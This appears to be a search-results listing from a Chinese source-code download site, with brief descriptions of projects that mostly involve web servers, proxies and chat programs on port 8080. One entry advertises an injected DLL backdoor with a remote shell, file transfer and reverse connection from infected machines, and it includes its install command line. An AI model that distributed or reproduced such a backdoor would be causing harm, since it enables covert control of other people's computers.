搜索资源列表
用Java实现Web服务器
- 用Java实现Web服务器 本文实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则发送错误信息给Web浏览器。最后,关闭与相应Web浏览器连接
jsp-chapter5
- 本实例是一个由JSP实现的网上购物系统。本实例实现了基本的登录验证、查询商品、分页处理、购物车处理以及订单处理功能。程序安装方法是: 第一步:将cart.jsp复制到C:\\Apache Tomcat 4.0\\webapps\\ROOT下。 第二步:将cart目录(包含*.class文件及*.java文件)复制到C:\\Apache Tomcat 4.0\\common\\classes目录中。 第三步:将cart.mdb复制到C:\\下。 第四步:配制ODBC数据源,在
qddown_java8543535625
- 系统采用客户/服务器摸式 服务器与客户间通过套接口Socket(TCP)连接。在java中使用套接口相当简单,Java API为处理套接口的通信提供了一个类java.net.Socket.,使得编写网络应用程序相对容易.服务器采用多线程以满足多用户的请求,通过JDBC与后台数据库连接,并通过创建一个ServerSocket对象来监听来自客户的连接请求,默认端口为8080,然后无限循环调用accept()方法接受客户程序的连接
assniffer01
- *** *** *** *** *** *** *** * assniffer v0.1 alpha, Copyright (C) 2004, Cockos Incorporated ******************************************************************************* Usage: assniffer output_directory [-d deviceindex] [flags (see bel
基于JAVA的ICQ系统的设计于实现
- 服务器与客户间通过套接口Socket(TCP)连接。在java中使用套接口相当简单,Java API为处理套接口的通信提供了一个类java.net.Socket.,使得编写网络应用程序相对容易.服务器采用多线程以满足多用户的请求,通过JDBC与后台数据库连接,并通过创建一个ServerSocket对象来监听来自客户的连接请求,默认端口为8080。-server and client presentation by Socket Interface (TCP) connections. Java
5ivb_162633
- 建立自己的代理服务器,开放8080端口就可以让人家用你的IP代理了.可以控制联结量.看软件图片.-establish their own proxy servers, open ports on the 8080 can make your home the IP. Link can control the volume. See photo software.
050615adminchick-backdoor
- 注入进程的 超强DLL后门* 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须
v4l2_camera 视频采集服务器
- 一个视频采集服务器,将摄像头(支持JPEG)采集的视频客户端, 客户端可以是浏览器,http://localhost:端口号/?action=stream qt客户短 注意:编译时不能用makefile(每做好) 执行时如:execute_file /dev/vedio0 -A video capture server, the camera (supports JPEG) capture video client, the client can be a browse
jwm0.1a
- Web MSN 安装方法: -download 这个附件,放进 TOMCAT/webapps directory内, -然后 restart tomcat -打开browser,输入以下url即可: http://localhost:8080/jwm0.1a/ -Web MSN installation method:-download the attachment into the TOMCAT/webapps directory, the- and th
axis-kickstart
- 先配置好JDK 和Tomcat。本文中使用的是JDK 5.0(源代码是1.4 的)。Tomcat 是5.0.28。 下载AXIS 1.4,地址http://ws.apache.org/ 安装AXIS 解压开axis1_ 4.zip ,将axis1_ 4/webapps/axis 拷贝到 $TOMCAT_HOME/webapps/ 下启动tomcat,打开页面http://localhost:8080/axi s 页面正常,表示axis 安装正确。-First conf
linux_echo
- echo服务器示例程序,当收到客户端的数据,服务器把数据不经加工地发送给客户。采用TCP连接,采用端口8080进行设计,在整个过程中主要涉及socket的通信。-echo server sample application, when received by the client data, the server does not re-processing the data sent to clients. The use of TCP connection, using port 8080
QQkjrqjl
- 基于UDP的聊天程序,实现在局域网内的通信,建议使用1024以上的端口,例如-UDP-based chat program, the realization of the communication in the LAN, it is recommended to use more than 1024 ports, such as the 8080
webweb
- 在Linux环境下主要用C语言写的一个简单的web服务器。在地址栏中输入地址如:http://192.168.2.20:8080/1可以显示图片。-Mainly used in the Linux environment, C language to write a simple web server. Enter the address in the address bar, such as: http://192.168.2.20:8080/1 can display pictures.
hx
- a proxy of network with c in the linux, its function includes entry: -a proxy of network with c in the linux, its function includes entry: 8080
Cache-Server
- this cache server that cache web pages and can use with set proxy in browser to 127.0.0.1:8080 -this is cache server that cache web pages and can use with set proxy in browser to 127.0.0.1:8080
web-sever
- 用Java实现Web服务器 实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则发送错误信息给Web浏览器。最后,关闭与相应Web浏览器连接的s
MiniHttpServer
- 读取本机UDP某端口(6100)的数据,并以http服务的方式,允许客户端通过http://server.ip:8080的试工请求到数据,常用于流媒体服务转发等。-read data from localhost udp port, then server at http 8080 port. It allow the client request from http 8080 port to recevie data. common use in streaming server.
portmap-master
- 端口映射器PortMap 运行配置参数需要修改文件conf.cfg, 如: server port=8080 remote host=127.0.0.1:80 在release下有已经编译好的exe, 可以直接测试使用.-Port Mapper PortMap configuration file to run the configuration parameters need to modify the file conf.cfg, such as: server po
mongoose-4.1
- Mongoose是一个web服务器,通过提供一个web接口给它,它可以嵌入到现有的应用程序中去。Mongoose web服务器的执行是自满足的,它不依赖于任何其他服务。如果你将它复制到任何目录并执行,它将将启动web服务并将当前目录作为主目录、端口号是8080。-Mongoose is a web server, by providing a web interface to give it, it can be embedded into existing applications go. E
_webserv
- Small web-server *. 1. Multithreading. 2. Opens for input connections on port 8080. 3. Provides access to everything on the disk C:\. (For example http://192.168.1.202:8080/123.txt file contents of the file in the browser - C:\123.txt)
